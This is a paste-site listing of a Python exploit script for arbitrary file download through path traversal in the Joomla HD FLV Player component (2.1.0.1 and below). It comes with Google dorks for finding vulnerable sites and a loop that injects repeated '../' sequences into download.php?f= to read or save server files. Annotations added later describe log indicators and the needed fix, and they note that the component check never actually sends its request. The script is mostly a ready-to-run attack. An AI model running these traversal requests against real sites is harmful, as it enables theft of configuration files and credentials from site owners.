amiralbenz

2.0.1

Jul 11th, 2015
  1. #!/usr/bin/env python
  2. #
  3. # Exploit Title : Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
  4. #
  5. # Exploit Author : amiral benz
  6. # Dork google 1: inurl:/component/hdflvplayer/
  7. # Dork google 2: inurl:com_hdflvplayer
  8. # Info:
  9. # Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
  10. # Http connection
  11. import urllib, urllib2
  12. # String manipulation
  13. import re
  14. # Time management
  15. import time
  16. # Args management
  17. import optparse
  18. # Error management
  19. import sys
  20.  
  # ASCII-art banner string; the script passes it to print() before the usage
  # text and again at the start of a normal run. It also carries the affected
  # version range ("<= 2.1.0.1") and the author credit.
  # NOTE(review): the art's internal spacing was collapsed when this listing was
  # extracted, so the rendering below is not the author's original layout.
  21. banner = """
  22. _______ __ ___ ___ ______
  23. | _ .-----.-----.--------| .---.-. | Y | _ \\
  24. |___| | _ | _ | | | _ | |. 1 |. | \\
  25. |. | |_____|_____|__|__|__|__|___._| |. _ |. | \\
  26. |: 1 | |: | |: 1 /
  27. |::.. . | |::.|:. |::.. . /
  28. `-------' `--- ---`------'
  29. _______ ___ ___ ___ _______ __
  30. | _ | | | Y | | _ | .---.-.--.--.-----.----.
  31. |. 1___|. | |. | | |. 1 | | _ | | | -__| _|
  32. |. __) |. |___|. | | |. ____|__|___._|___ |_____|__|
  33. |: | |: 1 |: 1 | |: | |_____|
  34. |::.| |::.. . |\:.. ./ |::.|
  35. `---' `-------' `---' `---'
  36.  
  37. <= 2.1.0.1
  38.  
  39. Written by:
  40.  
  41. amiral benz
  42. """
  43.  
def checkurl(url):
    """Return *url* unchanged when it starts with ``http://`` or ``https://``.

    Any other value prints an error line and ends the process with exit
    status 1. Only the scheme prefix is inspected; host, port and path are
    passed through untouched.
    """
    has_scheme = url[:7] == "http://" or url[:8] == "https://"
    if has_scheme:
        return url
    print('[X] You must insert http:// or https:// procotol')
    sys.exit(1)
  51.  
  52.  
def checkcomponent(url, headers):
    """Print the "Searching HD FLV Extension" status line for *url*.

    A ``urllib2.Request`` for the component's ``download.php`` is built with
    *headers*, but it is never opened: this step sends nothing over the
    network, leaves no entry in the web server's access log, and the
    "FOUND" line is written whenever the object can be constructed. The
    ``HTTPError`` and ``URLError`` handlers are kept exactly as the original
    has them.
    """
    endpoint = url + '/components/com_hdflvplayer/hdflvplayer/download.php'
    try:
        probe = urllib2.Request(endpoint, None, headers)
        sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
        print("")
    except urllib2.HTTPError:
        sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
        sys.exit(1)
    except urllib2.URLError:
        print('[X] Connection Error')
  64.  
  65. def checkversion(url,headers):
      # Fetch <url>/modules/mod_hdflvplayer/mod_hdflvplayer.xml with the supplied
      # headers and print the value found on a line containing "<version>".
      # Log view: this is a plain GET for the module manifest, and the driver
      # code calls this function before connection(), so it precedes the
      # download.php requests.
      # NOTE(review): indentation was lost in this listing; the nesting of the
      # statements below is not recoverable from the page alone.
  66.  
  67. try:
  68. req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
      # The whole manifest is read into a list of lines before scanning.
  69. response = urllib2.urlopen(req).readlines()
  70.  
  71. for line_version in response:
  72.  
      # find() returns -1 when the tag is absent, so this selects lines that
      # contain "<version>".
  73. if not line_version.find("<version>") == -1:
  74.  
      # Non-greedy capture of the text between the first '>' and the next '<'.
  75. VER = re.compile('>(.*?)<').search(line_version).group(1)
  76.  
      # NOTE(review): presumably printed once per matching line; VER is unbound
      # if no line matched and this runs outside the if. Confirm against the
      # original indentation.
  77. sys.stdout.write("\r[+] Checking Version: "+str(VER))
  78. print("")
  79.  
      # An HTTP error status (e.g. manifest not reachable) is reported as
      # "Unknown"; no exit call is visible in this handler.
  80. except urllib2.HTTPError:
  81. sys.stdout.write("\r[+] Checking Version: Unknown")
  82.  
      # A transport-level failure prints an error and is followed by sys.exit(1).
  83. except urllib2.URLError:
  84. print("\n[X] Connection Error")
  85. sys.exit(1)
  86.  
  87. def connection(url,headers,pathtrav):
      # Request the component's download.php with the "f" query parameter set to
      # a growing run of "../" followed by pathtrav, and treat a non-empty body
      # without PHP's "failed to open stream" text as a successful file read.
      # Log view: a series of GETs to the same download.php path whose f= value
      # starts with 1, 2, 3 ... "../" segments, all carrying the fixed
      # User-Agent passed in via headers.
      # Server side, the listing header puts HD FLV 2.1.0.1 and below in scope;
      # the handler has to resolve "f" to a canonical path and refuse anything
      # outside its media directory.
      # NOTE(review): indentation was lost in this listing; the nesting described
      # in the comments below is inferred and should be confirmed.
  88.  
      # char is the traversal segment, s the accumulated prefix; bar/barcount
      # only drive the progress display.
  89. char = "../"
  90. bar = "#"
  91. s = ""
  92. barcount = ""
  93.  
      # range(1,20) yields 19 iterations; the loop variable itself is unused.
  94. for a in range(1,20):
  95.  
  96. s += char
  97. barcount += bar
  98. sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
  99. sys.stdout.flush()
  100.  
  101. try:
      # The prefix and path are concatenated into the query string as-is, with
      # no URL encoding applied.
  102. req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
  103. response = urllib2.urlopen(req)
  104.  
  105. content = response.read()
  106.  
      # Success heuristic only: any other non-empty 200 body (for example a
      # custom error page) also passes this test.
  107. if content != "" and not "failed to open stream" in content:
  108. print("\n[!] VULNERABLE")
  109. print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
  110. print("")
  111. print("[+] Do you want [D]ownload or [R]ead the file?")
  112. print("[+]")
  113. sys.stdout.write("\r[+] Please respond with 'D' or 'R': ")
  114.  
  115. download = set(['d'])
  116. read = set(['r'])
  117.  
      # Re-prompts until the lower-cased input is exactly "d" or "r"; both
      # accepted answers return True.
  118. while True:
  119. choice = raw_input().lower()
  120. if choice in download:
      # The local file name is the last "/"-separated component of pathtrav.
  121. filedown = pathtrav.split('/')[-1]
      # urlretrieve is called without the headers dict, so this second request
      # is sent with the library's default User-Agent rather than the
      # browser-like string used above.
  122. urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
  123. print("[!] DOWNLOADED!")
  124. print("[!] Check file: "+filedown)
  125. return True
  126. elif choice in read:
  127. print("")
      # Prints the body already fetched; no further request is made.
  128. print content
  129. return True
  130. else:
  131. sys.stdout.write("\r[X] Please respond with 'D' or 'R': ")
  132.  
      # HTTP error statuses are swallowed without output; the message line is
      # commented out.
  133. except urllib2.HTTPError:
  134. #print '[X] HTTP Error'
  135. pass
  136. except urllib2.URLError:
  137. print '\n[X] Connection Error'
  138.  
      # NOTE(review): presumably inside the loop, spacing attempts one second
      # apart. Confirm.
  139. time.sleep(1)
      # Reached when no attempt returned; presumably after the loop has ended.
  140. print("\n[X] File not found or fixed component :(")
  141.  
# Command-line interface: -t/--target is the site base URL and -f/--file the
# path requested through the component. Both options are mandatory.
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
commandList.add_option(
    '-t', '--target',
    action="store",
    help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option(
    '-f', '--file',
    action="store",
    help="Insert file to check",
)
options, remainder = commandList.parse_args()

# The banner is printed on every run; when either option is missing the usage
# text follows and the process exits with status 1.
print(banner)
if not (options.target and options.file):
    commandList.print_help()
    sys.exit(1)

url = checkurl(options.target)
pathtrav = options.file

# One fixed browser-like User-Agent is handed to every stage below. Because it
# never varies between runs, the exact string is usable as a log indicator.
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
}

# Stages run in a fixed order; each progress prefix begins with "\r" so the
# stage that follows can overwrite it with its result.
sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
checkcomponent(url, headers)

sys.stdout.write("\r[+] Checking Version: ")
checkversion(url, headers)

sys.stdout.write("\r[+] Exploiting...please wait:")
connection(url, headers, pathtrav)